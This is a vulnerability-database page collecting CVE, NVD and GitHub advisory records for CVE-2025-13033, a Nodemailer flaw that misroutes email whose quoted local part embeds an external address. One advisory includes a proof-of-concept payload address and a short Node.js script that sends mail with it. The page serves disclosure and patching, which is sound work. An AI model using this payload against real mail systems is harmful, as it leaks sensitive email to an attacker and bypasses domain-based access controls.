CVE-2025-13033 (GCVE-0-2025-13033)
Vulnerability from cvelistv5
Published
2025-11-14 19:37
Modified
2025-11-14 20:00
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-436 - Interpretation Conflict
Summary
A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.
References
Impacted products
| Vendor | Product | Version | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Red Hat | Red Hat Advanced Cluster Management for Kubernetes 2 |
cpe:/a:redhat:acm:2 |
||||||||||||
|
||||||||||||||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-13033",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-11-14T20:00:22.140079Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-11-14T20:00:51.936Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:acm:2"
],
"defaultStatus": "affected",
"packageName": "rhacm2/acm-grafana-rhel9",
"product": "Red Hat Advanced Cluster Management for Kubernetes 2",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:ceph_storage:8"
],
"defaultStatus": "affected",
"packageName": "rhceph/grafana-rhel9",
"product": "Red Hat Ceph Storage 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhdh:1"
],
"defaultStatus": "affected",
"packageName": "rhdh/rhdh-hub-rhel9",
"product": "Red Hat Developer Hub",
"vendor": "Red Hat"
}
],
"datePublic": "2025-10-07T13:42:02.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-436",
"description": "Interpretation Conflict",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-14T19:37:08.224Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"name": "RHBZ#2402179",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"url": "https://github.com/nodemailer/nodemailer"
},
{
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
}
],
"timeline": [
{
"lang": "en",
"time": "2025-10-07T15:03:14.483722+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2025-10-07T13:42:02+00:00",
"value": "Made public."
}
],
"title": "Nodemailer: nodemailer: email to an unintended domain can occur due to interpretation conflict",
"workarounds": [
{
"lang": "en",
"value": "Currently there\u0027s no available mitigation for this flaw."
}
],
"x_redhatCweChain": "(CWE-20|CWE-436): Improper Input Validation or Interpretation Conflict"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2025-13033",
"datePublished": "2025-11-14T19:37:08.224Z",
"dateReserved": "2025-11-11T16:15:03.749Z",
"dateUpdated": "2025-11-14T20:00:51.936Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-13033\",\"sourceIdentifier\":\"secalert@redhat.com\",\"published\":\"2025-11-14T20:15:45.957\",\"lastModified\":\"2025-11-18T14:06:55.963\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"secalert@redhat.com\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\",\"baseScore\":7.5,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":3.9,\"impactScore\":3.6}]},\"weaknesses\":[{\"source\":\"secalert@redhat.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-436\"}]}],\"references\":[{\"url\":\"https://access.redhat.com/security/cve/CVE-2025-13033\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://bugzilla.redhat.com/show_bug.cgi?id=2402179\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://github.com/nodemailer/nodemailer\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626\",\"source\":\"secalert@redhat.com\"},{\"url\":\"https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87\",\"source\":\"secalert@redhat.com\"}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2025-13033\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-11-14T20:00:22.140079Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-11-14T20:00:42.733Z\"}}], \"cna\": {\"title\": \"Nodemailer: nodemailer: email to an unintended domain can occur due to interpretation conflict\", \"metrics\": [{\"other\": {\"type\": \"Red Hat severity rating\", \"content\": {\"value\": \"Moderate\", \"namespace\": \"https://access.redhat.com/security/updates/classification/\"}}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"cpes\": [\"cpe:/a:redhat:acm:2\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Advanced Cluster Management for Kubernetes 2\", \"packageName\": \"rhacm2/acm-grafana-rhel9\", \"collectionURL\": \"https://access.redhat.com/downloads/content/package-browser/\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:ceph_storage:8\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Ceph Storage 8\", \"packageName\": \"rhceph/grafana-rhel9\", \"collectionURL\": \"https://access.redhat.com/downloads/content/package-browser/\", \"defaultStatus\": \"affected\"}, {\"cpes\": [\"cpe:/a:redhat:rhdh:1\"], \"vendor\": \"Red Hat\", \"product\": \"Red Hat Developer Hub\", \"packageName\": \"rhdh/rhdh-hub-rhel9\", \"collectionURL\": \"https://access.redhat.com/downloads/content/package-browser/\", \"defaultStatus\": \"affected\"}], \"timeline\": [{\"lang\": \"en\", \"time\": \"2025-10-07T15:03:14.483722+00:00\", \"value\": \"Reported to Red Hat.\"}, {\"lang\": \"en\", \"time\": \"2025-10-07T13:42:02+00:00\", \"value\": \"Made public.\"}], \"datePublic\": \"2025-10-07T13:42:02.000Z\", \"references\": [{\"url\": \"https://access.redhat.com/security/cve/CVE-2025-13033\", \"tags\": [\"vdb-entry\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://bugzilla.redhat.com/show_bug.cgi?id=2402179\", \"name\": \"RHBZ#2402179\", \"tags\": [\"issue-tracking\", \"x_refsource_REDHAT\"]}, {\"url\": \"https://github.com/nodemailer/nodemailer\"}, {\"url\": \"https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626\"}, {\"url\": \"https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87\"}], \"workarounds\": [{\"lang\": \"en\", \"value\": \"Currently there\u0027s no available mitigation for this flaw.\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-436\", \"description\": \"Interpretation Conflict\"}]}], \"providerMetadata\": {\"orgId\": \"53f830b8-0a3f-465b-8143-3b8a9948e749\", \"shortName\": \"redhat\", \"dateUpdated\": \"2025-11-14T19:37:08.224Z\"}, \"x_redhatCweChain\": \"(CWE-20|CWE-436): Improper Input Validation or Interpretation Conflict\"}}",
"cveMetadata": "{\"cveId\": \"CVE-2025-13033\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-11-14T20:00:51.936Z\", \"dateReserved\": \"2025-11-11T16:15:03.749Z\", \"assignerOrgId\": \"53f830b8-0a3f-465b-8143-3b8a9948e749\", \"datePublished\": \"2025-11-14T19:37:08.224Z\", \"assignerShortName\": \"redhat\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
fkie_cve-2025-13033
Vulnerability from fkie_nvd
Published
2025-11-14 20:15
Modified
2025-11-18 14:06
Severity ?
Summary
A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.
References
| URL | Tags | ||
|---|---|---|---|
| secalert@redhat.com | https://access.redhat.com/security/cve/CVE-2025-13033 | ||
| secalert@redhat.com | https://bugzilla.redhat.com/show_bug.cgi?id=2402179 | ||
| secalert@redhat.com | https://github.com/nodemailer/nodemailer | ||
| secalert@redhat.com | https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626 | ||
| secalert@redhat.com | https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87 |
Impacted products
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls."
}
],
"id": "CVE-2025-13033",
"lastModified": "2025-11-18T14:06:55.963",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "secalert@redhat.com",
"type": "Primary"
}
]
},
"published": "2025-11-14T20:15:45.957",
"references": [
{
"source": "secalert@redhat.com",
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"source": "secalert@redhat.com",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"source": "secalert@redhat.com",
"url": "https://github.com/nodemailer/nodemailer"
},
{
"source": "secalert@redhat.com",
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"source": "secalert@redhat.com",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
}
],
"sourceIdentifier": "secalert@redhat.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-436"
}
],
"source": "secalert@redhat.com",
"type": "Primary"
}
]
}
ghsa-jj37-3377-m6vv
Vulnerability from github
Published
2025-11-14 21:30
Modified
2025-11-17 17:17
Severity ?
VLAI Severity ?
Summary
Duplicate Advisory: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
Details
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-mm7p-fcc7-pg87. This link is maintained to preserve external references.
Original Description
A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2025-11-17T17:17:33Z",
"nvd_published_at": "2025-11-14T20:15:45Z",
"severity": "HIGH"
},
"details": "## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-mm7p-fcc7-pg87. This link is maintained to preserve external references.\n\n## Original Description\nA vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker\u0027s external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.",
"id": "GHSA-jj37-3377-m6vv",
"modified": "2025-11-17T17:17:33Z",
"published": "2025-11-14T21:30:29Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Duplicate Advisory: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict",
"withdrawn": "2025-11-17T17:17:33Z"
}
ghsa-mm7p-fcc7-pg87
Vulnerability from github
Published
2025-10-07 13:42
Modified
2025-11-17 17:29
Severity ?
VLAI Severity ?
Summary
Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict
Details
The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.
Payload: "xclow3n@gmail.com x"@internal.domain
Using the following code to send mail
```
const nodemailer = require("nodemailer");
let transporter = nodemailer.createTransport({ service: "gmail", auth: { user: "", pass: "", }, });
let mailOptions = { from: '"Test Sender" your_email@gmail.com', to: "\"xclow3n@gmail.com x\"@internal.domain", subject: "Hello from Nodemailer", text: "This is a test email sent using Gmail SMTP and Nodemailer!", };
transporter.sendMail(mailOptions, (error, info) => { if (error) { return console.log("Error: ", error); } console.log("Message sent: %s", info.messageId);
});
(async () => { const parser = await import("@sparser/email-address-parser"); const { EmailAddress, ParsingOptions } = parser.default; const parsed = EmailAddress.parse(mailOptions.to /, new ParsingOptions(true) /);
if (!parsed) { console.error("Invalid email address:", mailOptions.to); return; }
console.log("Parsed email:", {
address: ${parsed.localPart}@${parsed.domain},
local: parsed.localPart,
domain: parsed.domain,
});
})();
```
Running the script and seeing how this mail is parsed according to RFC
Parsed email: {
address: '"xclow3n@gmail.com x"@internal.domain',
local: '"xclow3n@gmail.com x"',
domain: 'internal.domain'
}
But the email is sent to xclow3n@gmail.com
Impact:
-
Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.
-
Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.
-
Potential compliance issue: Violates RFC 5321/5322 parsing rules.
-
Domain based access control bypass in downstream applications using your library to send mails
Recommendations
-
Fix parser to correctly treat quoted local-parts per RFC 5321/5322.
-
Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-13033"
],
"database_specific": {
"cwe_ids": [
"CWE-20",
"CWE-436"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-07T13:42:02Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "The email parsing library incorrectly handles quoted local-parts containing @. This leads to misrouting of email recipients, where the parser extracts and routes to an unintended domain instead of the RFC-compliant target.\n\nPayload: `\"xclow3n@gmail.com x\"@internal.domain`\nUsing the following code to send mail\n```\nconst nodemailer = require(\"nodemailer\");\n\nlet transporter = nodemailer.createTransport({\n service: \"gmail\",\n auth: {\n user: \"\",\n pass: \"\",\n },\n});\n\nlet mailOptions = {\n from: \u0027\"Test Sender\" \u003cyour_email@gmail.com\u003e\u0027, \n to: \"\\\"xclow3n@gmail.com x\\\"@internal.domain\",\n subject: \"Hello from Nodemailer\",\n text: \"This is a test email sent using Gmail SMTP and Nodemailer!\",\n};\n\ntransporter.sendMail(mailOptions, (error, info) =\u003e {\n if (error) {\n return console.log(\"Error: \", error);\n }\n console.log(\"Message sent: %s\", info.messageId);\n\n});\n\n\n(async () =\u003e {\n const parser = await import(\"@sparser/email-address-parser\");\n const { EmailAddress, ParsingOptions } = parser.default;\n const parsed = EmailAddress.parse(mailOptions.to /*, new ParsingOptions(true) */);\n\n if (!parsed) {\n console.error(\"Invalid email address:\", mailOptions.to);\n return;\n }\n\n console.log(\"Parsed email:\", {\n address: `${parsed.localPart}@${parsed.domain}`,\n local: parsed.localPart,\n domain: parsed.domain,\n });\n})();\n```\n\nRunning the script and seeing how this mail is parsed according to RFC\n\n```\nParsed email: {\n address: \u0027\"xclow3n@gmail.com x\"@internal.domain\u0027,\n local: \u0027\"xclow3n@gmail.com x\"\u0027,\n domain: \u0027internal.domain\u0027\n}\n```\n\nBut the email is sent to `xclow3n@gmail.com`\n\n\u003cimg width=\"2128\" height=\"439\" alt=\"Image\" src=\"https://github.com/user-attachments/assets/20eb459c-9803-45a2-b30e-5d1177d60a8d\" /\u003e\n\n\n### Impact:\n\n- Misdelivery / Data leakage: Email is sent to psres.net instead of test.com.\n\n- Filter evasion: Logs and anti-spam systems may be bypassed by hiding recipients inside quoted local-parts.\n\n- Potential compliance issue: Violates RFC 5321/5322 parsing rules.\n\n- Domain based access control bypass in downstream applications using your library to send mails\n\n### Recommendations\n\n- Fix parser to correctly treat quoted local-parts per RFC 5321/5322.\n\n- Add strict validation rejecting local-parts containing embedded @ unless fully compliant with quoting.",
"id": "GHSA-mm7p-fcc7-pg87",
"modified": "2025-11-17T17:29:26Z",
"published": "2025-10-07T13:42:02Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2025-13033"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.
Loading…
Loading…